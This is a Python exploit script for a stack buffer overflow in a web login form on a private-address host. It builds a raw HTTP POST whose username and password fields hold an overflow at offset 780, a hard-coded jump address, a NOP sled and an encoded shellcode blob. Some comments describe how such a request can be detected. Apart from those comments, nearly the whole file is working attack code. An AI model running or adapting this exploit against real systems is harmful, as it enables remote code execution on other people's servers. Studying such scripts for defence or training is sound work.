- #!/usr/bin/env python
- import socket
- import time
# Target endpoint is hard-coded (an RFC 1918 private address); note that
# send_payload() repeats the same literal in its Host header instead of
# reading `host`, so the two can silently diverge if one is edited.
host = '192.168.2.19'
port = 8080
def send_payload(payload):
    """Send one hand-assembled HTTP POST to host:port carrying *payload*.

    The request is built as a raw string (no HTTP library), written with a
    single send(), and the socket is closed without reading any response.
    *payload* is placed verbatim in both the ``username`` and ``password``
    form fields.

    Detection note: the ``Content-Length`` header is a fixed constant that is
    not derived from the body actually written, so a server or proxy sees a
    body shorter than advertised together with oversized login fields -- a
    protocol anomaly that request-validation logging and form-field length
    limits can flag before the request reaches the login handler.
    """
    evil = "POST /login HTTP/1.1\r\n"
    # Host header duplicates the module-level `host` literal rather than using it.
    evil += "Host: 192.168.2.19\r\n"
    evil += "User-Agent: Mozilla/5.0\r\n"
    evil += "Connection: close\r\n"
    evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    evil += "Accept-Language: en-us,en;q=0.5\r\n"
    evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
    # Keep-Alive / Proxy-Connection contradict the Connection: close above.
    evil += "Keep-Alive: 300\r\n"
    evil += "Proxy-Connection: keep-alive\r\n"
    evil += "Content-Type: application/x-www-form-urlencoded\r\n"
    # Constant length header; it does not reflect len(payload).
    evil += "Content-Length: 17000\r\n\r\n"
    # Same payload in both form fields.
    evil += "username=" + payload
    evil += "&password=" + payload + "\r\n"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # socket.connect() returns None; the `connect` name is never used.
    connect = s.connect((host, port))
    # send() return value (bytes written) is ignored and no response is read.
    s.send(evil)
    s.close()
- shellcode = ("\xda\xc0\xbf\x6d\xc8\xba\x9a\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
- "\x56\x31\x7a\x18\x83\xea\xfc\x03\x7a\x79\x2a\x4f\x66\x69\x28"
- "\xb0\x97\x69\x4d\x38\x72\x58\x4d\x5e\xf6\xca\x7d\x14\x5a\xe6"
- "\xf6\x78\x4f\x7d\x7a\x55\x60\x36\x31\x83\x4f\xc7\x6a\xf7\xce"
- "\x4b\x71\x24\x31\x72\xba\x39\x30\xb3\xa7\xb0\x60\x6c\xa3\x67"
- "\x95\x19\xf9\xbb\x1e\x51\xef\xbb\xc3\x21\x0e\xed\x55\x3a\x49"
- "\x2d\x57\xef\xe1\x64\x4f\xec\xcc\x3f\xe4\xc6\xbb\xc1\x2c\x17"
- "\x43\x6d\x11\x98\xb6\x6f\x55\x1e\x29\x1a\xaf\x5d\xd4\x1d\x74"
- "\x1c\x02\xab\x6f\x86\xc1\x0b\x54\x37\x05\xcd\x1f\x3b\xe2\x99"
- "\x78\x5f\xf5\x4e\xf3\x5b\x7e\x71\xd4\xea\xc4\x56\xf0\xb7\x9f"
- "\xf7\xa1\x1d\x71\x07\xb1\xfe\x2e\xad\xb9\x12\x3a\xdc\xe3\x7a"
- "\x8f\xed\x1b\x7a\x87\x66\x6f\x48\x08\xdd\xe7\xe0\xc1\xfb\xf0"
- "\x71\xc5\xfb\x2f\x39\x86\x05\xd0\x39\x8e\xc1\x84\x69\xb8\xe0"
- "\xa4\xe2\x38\x0c\x71\x9e\x32\x9a\xba\xf6\x41\x4d\x53\x04\x46"
- "\x60\xff\x81\xa0\xd2\xaf\xc1\x7c\x93\x1f\xa1\x2c\x7b\x4a\x2e"
- "\x12\x9b\x75\xe5\x3b\x36\x9a\x53\x13\xaf\x03\xfe\xef\x4e\xcb"
- "\xd5\x95\x51\x47\xdf\x6a\x1f\xa0\xaa\x78\x48\xd7\x54\x81\x89"
- "\x72\x54\xeb\x8d\xd4\x03\x83\x8f\x01\x63\x0c\x6f\x64\xf0\x4b"
- "\x8f\xf9\xc0\x20\xa6\x6f\x6c\x5f\xc7\x7f\x6c\x9f\x91\x15\x6c"
- "\xf7\x45\x4e\x3f\xe2\x89\x5b\x2c\xbf\x1f\x64\x04\x13\xb7\x0c"
- "\xaa\x4a\xff\x92\x55\xb9\x83\xd5\xa9\x3f\xac\x7d\xc1\xbf\xec"
- "\x7d\x11\xaa\xec\x2d\x79\x21\xc2\xc2\x49\xca\xc9\x8a\xc1\x41"
- "\x9c\x79\x70\x55\xb5\xdc\x2c\x56\x3a\xc5\xdf\x2d\x33\xfa\x20"
- "\xd2\x5d\x9f\x21\xd2\x61\xa1\x1e\x04\x58\xd7\x61\x94\xdf\xe8"
- "\xd4\xb9\x76\x63\x16\xed\x89\xa6")
if __name__ == '__main__':
    # [*] Exact match at offset 780
    # Request body layout as written: `offset` filler bytes, a 4-byte
    # hard-coded address, a 100-byte 0x90 run, the `shellcode` string, then
    # 0x90 padding sized so the whole payload is exactly `maxsize` bytes.
    # Detection note: on the wire this is a ~10 KB login form body dominated
    # by a long run of 0x41 followed by 0x90 bytes; enforcing length limits on
    # form fields, or alerting on long repeated-byte runs in request bodies,
    # catches this shape generically regardless of the specific bytes used.
    offset = 780
    maxsize = 10000
    jmpesp = '\x33\x5D\xCA\x77'
    payload = 'A' * offset + jmpesp + '\x90' * 100 + shellcode + '\x90'* (maxsize - offset - 4 - len(shellcode) - 100)
    send_payload(payload)